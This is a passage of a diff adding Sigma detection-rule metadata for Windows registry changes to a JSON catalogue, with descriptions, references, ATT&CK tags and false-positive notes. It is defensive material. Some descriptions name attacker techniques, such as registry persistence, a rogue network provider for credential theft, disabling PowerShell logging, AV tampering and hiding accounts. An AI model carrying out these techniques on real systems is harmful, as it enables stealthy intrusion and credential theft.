"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_mpnotify_persistence.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_mpnotify_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Might trigger if a legitimate new SIP provider is registered. But this is not a common occurrence in an environment and should be investigated either way" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the NGenAssemblyUsageLog registry key.\n.NET Usage Log output location can be controlled by setting the NGenAssemblyUsageLog CLR configuration knob in the Registry or by configuring an environment variable (as described in the next section).\nBy simplify specifying an arbitrary value (e.g. fake output location or junk data) for the expected value, a Usage Log file for the .NET execution context will not be created.\n", + "uuid": "28036918-04d3-423d-91c0-55ecf99fb892", + "value": "NET NGenAssemblyUsageLog Registry Key Tamper", + "meta": { + "refs": [ + "https://bohops.com/2021/03/16/investigating-net-clr-usage-log-tampering-techniques-for-edr-evasion/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_net_cli_ngenassemblyusagelog.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/11/18", + "filename": "registry_set_net_cli_ngenassemblyusagelog.yml", + "author": "frack113", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "A General detection for a new application in AppCompat. This indicates an application executing for the first time on an endpoint.", + "uuid": "60936b49-fca0-4f32-993d-7415edcf9a5d", + "value": "New Application in AppCompat", + "meta": { + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/1", + "https://threathunterplaybook.com/evals/apt29/detections/1.A.1_DFD6A782-9BDB-4550-AB6B-525E825B095E.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_application_appcompat.yml" + ], + "tags": [ + "attack.execution", + "attack.t1204.002" + ], + "creation_date": "2020/05/02", + "filename": "registry_set_new_application_appcompat.yml", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "level": "informational", + "falsepositive": [ + "This rule is to explore new applications on an endpoint. False positives depends on the organization.", + "Newly setup system.", + "Legitimate installation of new application." + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker tries to add a new network provider in order to dump clear text credentials, similar to how the NPPSpy tool does it", + "uuid": "0442defa-b4a2-41c9-ae2c-ea7042fc4701", + "value": "New Network Provider - Registry", + "meta": { + "refs": [ + "https://docs.microsoft.com/en-us/troubleshoot/windows-client/deployment/network-provider-settings-removed-in-place-upgrade", + "https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_new_network_provider.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003" + ], + "creation_date": "2022/08/23", + "filename": "registry_set_new_network_provider.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Other legitimate network providers used and not filtred in this rule" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Enable Dynamic Data Exchange protocol (DDE) in all supported editions of Microsoft Word or Excel.", + "uuid": "63647769-326d-4dde-a419-b925cc0caf42", + "value": "Enable Microsoft Dynamic Data Exchange", + "meta": { + "refs": [ + "https://msrc.microsoft.com/update-guide/vulnerability/ADV170021", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_enable_dde.yml" + ], + "tags": [ + "attack.execution", + "attack.t1559.002" + ], + "creation_date": "2022/02/26", + "filename": "registry_set_office_enable_dde.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry changes to Office macro settings. The TrustRecords contain information on executed macro-enabled documents. (see references)", + "uuid": "a166f74e-bf44-409d-b9ba-ea4b2dd8b3cd", + "value": "Office Security Settings Changed", + "meta": { + "refs": [ + "https://twitter.com/inversecos/status/1494174785621819397", + "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/zloader-with-a-new-infection-technique/", + "https://securelist.com/scarcruft-surveilling-north-korean-defectors-and-human-rights-activists/105074/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_security.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2020/05/22", + "filename": "registry_set_office_security.yml", + "author": "Trent Liffick (@tliffick)", + "level": "high", + "falsepositive": [ + "Valid Macros and/or internal documents" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects persistence via Visual Studio Tools for Office (VSTO) add-ins in Office applications.", + "uuid": "9d15044a-7cfe-4d23-8085-6ebc11df7685", + "value": "Stealthy VSTO Persistence", + "meta": { + "refs": [ + "https://twitter.com/_vivami/status/1347925307643355138", + "https://vanmieghem.io/stealth-outlook-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_office_vsto_persistence.yml" + ], + "tags": [ + "attack.t1137.006", + "attack.persistence" + ], + "creation_date": "2021/01/10", + "filename": "registry_set_office_vsto_persistence.yml", + "author": "Bhabesh Raj", + "level": "medium", + "falsepositive": [ + "Legitimate Addin Installation" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of Outlook Security Setting to allow unprompted execution. Goes with win_outlook_c2_macro_creation.yml and is particularly interesting if both events occur near to each other.", + "uuid": "e3b50fa5-3c3f-444e-937b-0a99d33731cd", + "value": "Outlook C2 Registry Key", + "meta": { + "refs": [ + "https://www.mdsec.co.uk/2020/11/a-fresh-outlook-on-mail-based-persistence/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_c2_registry_key.yml" + ], + "tags": [ + "attack.persistence", + "attack.command_and_control", + "attack.t1137", + "attack.t1008", + "attack.t1546" + ], + "creation_date": "2021/04/05", + "filename": "registry_set_outlook_c2_registry_key.yml", + "author": "@ScoubiMtl", + "level": "medium", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the manipulation of persistent URLs which could execute malicious code", + "uuid": "487bb375-12ef-41f6-baae-c6a1572b4dd1", + "value": "Persistent Outlook Landing Today Pages", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_todaypage.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2021/06/10", + "filename": "registry_set_outlook_registry_todaypage.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the manipulation of persistent URLs which can be malicious", + "uuid": "ddd171b5-2cc6-4975-9e78-f0eccd08cc76", + "value": "Persistent Outlook Landing Pages", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-persistence-via-microsoft-exchange-server-or-outlook?slide=70", + "https://support.microsoft.com/en-us/topic/outlook-home-page-feature-is-missing-in-folder-properties-d207edb7-aa02-46c5-b608-5d9dbed9bd04?ui=en-us&rs=en-us&ad=us", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_registry_webview.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1112" + ], + "creation_date": "2021/06/09", + "filename": "registry_set_outlook_registry_webview.yml", + "author": "Tobias Michalski", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Change outlook email security settings", + "uuid": "c3cefdf4-6703-4e1c-bad8-bf422fc5015a", + "value": "Change Outlook Security Setting in Registry", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1137/T1137.md", + "https://docs.microsoft.com/en-us/outlook/troubleshoot/security/information-about-email-security-settings", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_outlook_security.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1137" + ], + "creation_date": "2021/12/28", + "filename": "registry_set_outlook_security.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential persistence using Appx DebugPath", + "uuid": "df4dc653-1029-47ba-8231-3c44238cc0ae", + "value": "Windows Registry Persistence DebugPath", + "meta": { + "refs": [ + "https://oddvar.moe/2018/09/06/persistence-using-universal-windows-platform-apps-appx/", + "https://github.com/rootm0s/WinPwnage", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_appx_debugger.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/07/27", + "filename": "registry_set_persistence_appx_debugger.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects change the the \"AutodialDLL\" key which could be used as a persistence method to load custom DLL via the \"ws2_32\" library", + "uuid": "e6fe26ee-d063-4f5b-b007-39e90aaf50e3", + "value": "Persistence Via AutodialDLL", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2015/01/13/beyond-good-ol-run-key-part-24/", + "https://persistence-info.github.io/Data/autodialdll.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_autodial_dll.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/10", + "filename": "registry_set_persistence_autodial_dll.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential COM object hijacking where the \"Server\" (In/Out) is pointing to a supsicious or unsuale location", + "uuid": "3d968d17-ffa4-4bc0-bfdc-f139de76ce77", + "value": "COM Hijacking For Persistence With Suspicious Locations", + "meta": { + "refs": [ + "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/ (idea)", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_com_hijacking_susp_locations.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/07/28", + "filename": "registry_set_persistence_com_hijacking_susp_locations.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Probable legitimate applications. If you find these please add them to an exclusion list" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification to the \"Default\" value of the \"MyComputer\" key and subkeys to point to a custom binary that will be launched whenever the associated action is executed (see reference section for example)", + "uuid": "8fbe98a8-8f9d-44f8-aa71-8c572e29ef06", + "value": "Persistence Via MyComputer Key and SubKeys", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2017/01/18/beyond-good-ol-run-key-part-55/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_mycomputer.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/09", + "filename": "registry_set_persistence_mycomputer.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely but if you experience FPs add specific processes and locations you would like to monitor for" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects potential COM object hijacking leveraging the COM Search Order", + "uuid": "a0ff33d8-79e4-4cef-b4f3-9dc4133ccd12", + "value": "Windows Registry Persistence COM Search Order Hijacking", + "meta": { + "refs": [ + "https://www.cyberbit.com/blog/endpoint-security/com-hijacking-windows-overlooked-security-vulnerability/", + "https://attack.mitre.org/techniques/T1546/015/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_search_order.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2020/04/14", + "filename": "registry_set_persistence_search_order.yml", + "author": "Maxime Thiebaut (@0xThiebaut), oscd.community, C\u00e9dric Hien", + "level": "medium", + "falsepositive": [ + "Some installed utilities (i.e. OneDrive) may serve new COM objects at user-level" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects modification addition to the 'TypedPaths' key in the user or admin registry from a non standard application. Which might indicate persistence attempt", + "uuid": "086ae989-9ca6-4fe7-895a-759c5544f247", + "value": "Persistence Via TypedPaths", + "meta": { + "refs": [ + "https://twitter.com/dez_/status/1560101453150257154", + "https://forensafe.com/blogs/typedpaths.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_persistence_typed_paths.yml" + ], + "tags": [ + "attack.persistence" + ], + "creation_date": "2022/08/22", + "filename": "registry_set_persistence_typed_paths.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with attachment manager settings policies associations to lower the default file type risks (See reference for more information)", + "uuid": "a9b6c011-ab69-4ddb-bc0a-c4f21c80ec47", + "value": "Modify Attachment Manager Settings - Associations", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_associations_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_policies_associations_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tampering with attachment manager settings policies attachments (See reference for more information)", + "uuid": "ee77a5db-b0f3-4be2-bfd4-b58be1c6b15a", + "value": "Modify Attachment Manager Settings - Attachments", + "meta": { + "refs": [ + "https://support.microsoft.com/en-us/topic/information-about-the-attachment-manager-in-microsoft-windows-c48a4dcd-8de5-2af5-ee9b-cd795ae42738", + "https://www.virustotal.com/gui/file/2bcd5702a7565952c44075ac6fb946c7780526640d1264f692c7664c02c68465", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_policies_attachments_tamper.yml" + ], + "tags": [ + "attack.defense_evasion" + ], + "creation_date": "2022/08/01", + "filename": "registry_set_policies_attachments_tamper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects that a powershell code is written to the registry as a service.", + "uuid": "4a5f5a5e-ac01-474b-9b4e-d61298c9df1d", + "value": "PowerShell as a Service in Registry", + "meta": { + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_as_service.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569.002" + ], + "creation_date": "2020/10/06", + "filename": "registry_set_powershell_as_service.yml", + "author": "oscd.community, Natalia Shornikova", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adds a RUN key that contains a powershell keyword", + "uuid": "8d85cf08-bf97-4260-ba49-986a2a65129c", + "value": "Powershell in Windows Run Keys", + "meta": { + "refs": [ + "https://github.com/frack113/atomic-red-team/blob/a9051c38de8a5320b31c7039efcbd3b56cf2d65a/atomics/T1547.001/T1547.001.md#atomic-test-9---systembc-malware-as-a-service-registry", + "https://www.trendmicro.com/en_us/research/22/j/lv-ransomware-exploits-proxyshell-in-attack.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1547.001" + ], + "creation_date": "2022/03/17", + "filename": "registry_set_powershell_in_run_keys.yml", + "author": "frack113, Florian Roth", + "level": "medium", + "falsepositive": [ + "Legitimate admin or third party scripts" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the modification of the registry of the currently logged in user to disable PowerShell module logging, script block logging or transcription and script execution logging", + "uuid": "fecfd1a1-cc78-4313-a1ea-2ee2e8ec27a7", + "value": "PowerShell Logging Disabled", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md#atomic-test-32---windows-powershell-logging-disabled", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_powershell_logging_disabled.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.001" + ], + "creation_date": "2022/04/02", + "filename": "registry_set_powershell_logging_disabled.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when a new custom protocole handler is registered", + "uuid": "fdbf0b9d-0182-4c43-893b-a1eaab92d085", + "value": "Newly Registered Protocol Handler", + "meta": { + "refs": [ + "https://ladydebug.com/blog/2019/06/21/custom-protocol-handler-cph/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_register_custom_protocol_handler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/05/30", + "filename": "registry_set_register_custom_protocol_handler.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate applications registering a new custom protocol handler" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects non-sysinternals tools setting the \"accepteula\" key which normally is set on sysinternals tool execution", + "uuid": "8023f872-3f1d-4301-a384-801889917ab4", + "value": "Usage of Renamed Sysinternals Tools - RegistrySet", + "meta": { + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_renamed_sysinternals_eula_accepted.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2022/08/24", + "filename": "registry_set_renamed_sysinternals_eula_accepted.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unlikely" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect use of scrobj.dll as this DLL looks for the ScriptletURL key to get the location of the script to execute", + "uuid": "fe20dda1-6f37-4379-bbe0-a98d400cae90", + "value": "Scrobj.dll COM Hijacking", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1546.015/T1546.015.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scrobj_dll_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.015" + ], + "creation_date": "2022/08/20", + "filename": "registry_set_scrobj_dll_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate use of the dll." + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry key established after masqueraded .scr file execution using Rundll32 through desk.cpl", + "uuid": "40b6e656-4e11-4c0c-8772-c1cc6dae34ce", + "value": "ScreenSaver Registry Key Set", + "meta": { + "refs": [ + "https://twitter.com/VakninHai/status/1517027824984547329", + "https://twitter.com/pabraeken/status/998627081360695297", + "https://jstnk9.github.io/jstnk9/research/InstallScreenSaver-SCR-files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_scr_file_executed_by_rundll32.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ], + "creation_date": "2022/05/04", + "filename": "registry_set_scr_file_executed_by_rundll32.yml", + "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", + "level": "medium", + "falsepositive": [ + "Legitimate use of screen saver" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the \"ServiceDLL\" value related to a service in the registry. This is often used as a method of persistence.", + "uuid": "612e47e9-8a59-43a6-b404-f48683f45bd6", + "value": "ServiceDll Hijack", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1543.003/T1543.003.md#atomic-test-4---tinyturla-backdoor-service-w64time", + "https://www.hexacorn.com/blog/2013/09/19/beyond-good-ol-run-key-part-4/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_servicedll_hijack.yml" + ], + "tags": [ + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" + ], + "creation_date": "2022/02/04", + "filename": "registry_set_servicedll_hijack.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Administrative scripts", + "Installation of a service" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects registry modifications that disable internal tools or functions in explorer (malware like Agent Tesla uses this technique)", + "uuid": "1c3121ed-041b-4d97-a075-07f54f20fb4a", + "value": "Registry Explorer Policy Modification", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_set_nopolicies_user.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/03/18", + "filename": "registry_set_set_nopolicies_user.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Legitimate admin script" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims.\nThe Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time\n", + "uuid": "dfb5b4e8-91d0-4291-b40a-e3b0d3942c45", + "value": "Registry Key Creation or Modification for Shim DataBase", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.011/T1546.011.md#atomic-test-3---registry-key-creation-andor-modification-events-for-sdb", + "https://www.fireeye.com/blog/threat-research/2017/05/fin7-shim-databases-persistence.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_shim_databases_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.011" + ], + "creation_date": "2021/12/30", + "filename": "registry_set_shim_databases_persistence.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the Registry in which a monitor program gets registered to monitor the exit of another process", + "uuid": "c81fe886-cac0-4913-a511-2822d72ff505", + "value": "SilentProcessExit Monitor Registration", + "meta": { + "refs": [ + "https://oddvar.moe/2018/04/10/persistence-using-globalflags-in-image-file-execution-options-hidden-from-autoruns-exe/", + "https://www.deepinstinct.com/2021/02/16/lsass-memory-dumps-are-stealthier-than-ever-before-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_silentprocessexit.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], + "creation_date": "2021/02/26", + "filename": "registry_set_silentprocessexit.yml", + "author": "Florian Roth", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker register a new SIP provider for persistence and defense evasion", + "uuid": "5a2b21ee-6aaa-4234-ac9d-59a59edf90a1", + "value": "Persistence Via New SIP Provider", + "meta": { + "refs": [ + "https://persistence-info.github.io/Data/codesigning.html", + "https://github.com/gtworek/PSBits/tree/master/SIP", + "https://specterops.io/assets/resources/SpecterOps_Subverting_Trust_in_Windows.pdf", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sip_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.defense_evasion", + "attack.t1553.003" + ], + "creation_date": "2022/07/21", + "filename": "registry_set_sip_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "medium", + "falsepositive": [ + "Legitimate SIP being registered by the OS or different software." + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects tamper attempts to sophos av functionality via registry key modification", + "uuid": "9f4662ac-17ca-43aa-8f12-5d7b989d0101", + "value": "Tamper With Sophos AV Registry Keys", + "meta": { + "refs": [ + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_sophos_av_tamaper.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1562.001" + ], + "creation_date": "2022/09/02", + "filename": "registry_set_sophos_av_tamaper.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Some FP may occure when the feature is disabled by the AV itself, you should always investigate if the action was legitimate" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects when an attacker set the registry key \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\SpecialAccounts\\Userlist\" to \"0\" in order to hide user account.", + "uuid": "f8aebc67-a56d-4ec9-9fbe-7b0e8b7b4efd", + "value": "Hide User Account Via Special Accounts Reg Key", + "meta": { + "refs": [ + "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_special_accounts.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.002" + ], + "creation_date": "2022/07/12", + "filename": "registry_set_special_accounts.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detect set Notification_Suppress to 1 to disable the windows security center notification", + "uuid": "0c93308a-3f1b-40a9-b649-57ea1a1c1d63", + "value": "Activate Suppression of Windows Security Center Notifications", + "meta": { + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/40b77d63808dd4f4eafb83949805636735a1fd15/atomics/T1112/T1112.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_suppress_defender_notifications.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1112" + ], + "creation_date": "2022/08/19", + "filename": "registry_set_suppress_defender_notifications.yml", + "author": "frack113", + "level": "medium", + "falsepositive": [ + "Unknown" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects changes to the \"Default\" property for keys located in the \\Software\\Microsoft\\Windows\\CurrentVersion\\App Paths\\ registry. Which might be used as a method of persistence\nThe entries found under App Paths are used primarily for the following purposes.\nFirst, to map an application's executable file name to that file's fully qualified path.\nSecond, to pre-pend information to the PATH environment variable on a per-application, per-process basis.\n", + "uuid": "707e097c-e20f-4f67-8807-1f72ff4500d6", + "value": "Suspicious Values In App Paths Default Property", + "meta": { + "refs": [ + "https://www.hexacorn.com/blog/2013/01/19/beyond-good-ol-run-key-part-3/", + "https://docs.microsoft.com/en-us/windows/win32/shell/app-registration?redirectedfrom=MSDN", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_app_paths_persistence.yml" + ], + "tags": [ + "attack.persistence", + "attack.t1546.012" + ], + "creation_date": "2022/08/10", + "filename": "registry_set_susp_app_paths_persistence.yml", + "author": "Nasreddine Bencherchali", + "level": "high", + "falsepositive": [ + "Legitimate applications registering their binary from on of the suspicious locations mentioned above (tune it)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects the keyboard preload installation with a suspicious keyboard layout, e.g. Chinese, Iranian or Vietnamese layout load in user session on systems maintained by US staff only", + "uuid": "34aa0252-6039-40ff-951f-939fd6ce47d8", + "value": "Suspicious Keyboard Layout Load", + "meta": { + "refs": [ + "https://renenyffenegger.ch/notes/Windows/registry/tree/HKEY_CURRENT_USER/Keyboard-Layout/Preload/index", + "https://github.com/SwiftOnSecurity/sysmon-config/pull/92/files", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_keyboard_layout_load.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1588.002" + ], + "creation_date": "2019/10/12", + "filename": "registry_set_susp_keyboard_layout_load.yml", + "author": "Florian Roth", + "level": "medium", + "falsepositive": [ + "Administrators or users that actually use the selected keyboard layouts (heavily depends on the organisation's user base)" + ], + "logsource.category": "registry_set", + "logsource.product": "windows" + } + }, + { + "description": "Detects a suspicious printer driver installation with an empty Manufacturer value", + "uuid": "e0813366-0407-449a-9869-a2db1119dc41", + "value": "Suspicious Printer Driver Empty Manufacturer", + "meta": { + "refs": [ + "https://twitter.com/SBousseaden/status/1410545674773467140", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/registry/registry_set/registry_set_susp_printer_driver.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1574", + "cve.2021.1675" + ], + "creation_date": "2020/07/01", + "filename": 